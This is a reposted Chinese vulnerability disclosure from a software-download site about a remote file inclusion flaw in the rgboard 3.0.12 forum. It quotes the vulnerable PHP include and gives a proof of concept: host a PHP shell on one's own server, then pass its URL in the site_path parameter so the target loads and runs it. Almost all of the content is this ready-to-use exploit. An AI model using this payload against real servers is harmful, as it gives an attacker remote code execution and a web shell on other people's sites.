rgboard 论坛 漏洞 rgboard 3.0.12 远程文件包含漏洞

软件发布|下载排行|最新软件

当前位置:首页IT学院IT技术

rgboard 论坛 漏洞 rgboard 3.0.12 远程文件包含漏洞

  2021-03-17 我要评论
想了解rgboard 3.0.12 远程文件包含漏洞的相关内容吗,在本文为您仔细讲解rgboard 论坛 漏洞的相关知识和一些Code实例,欢迎阅读和指正,我们先划重点:rgboard,论坛,漏洞,下面大家一起来学习吧。
vul code:
\include\bbs.lib.inc.php:
if (!defined('BBS_LIB_INC_INCLUDED')) {
define('BBS_LIB_INC_INCLUDED', 1);
// *– BBS_LIB_INC_INCLUDED START –*
if(!$site_path) $site_path='./';
require_once “{$site_path}include/lib.inc.php”;
//$site_path没有过滤直接放过来包含了
poc:
在你的网站放个phpshell,目录和文件名为/include/lib.inc.php
然后访问
httP://www.target.com/include/bbs.lib.inc.php?site_path=http://yousite/

Copyright 2022 版权所有 软件发布 访问手机版

声明:所有软件和文章来自软件开发商或者作者 如有异议 请与本站联系 联系我们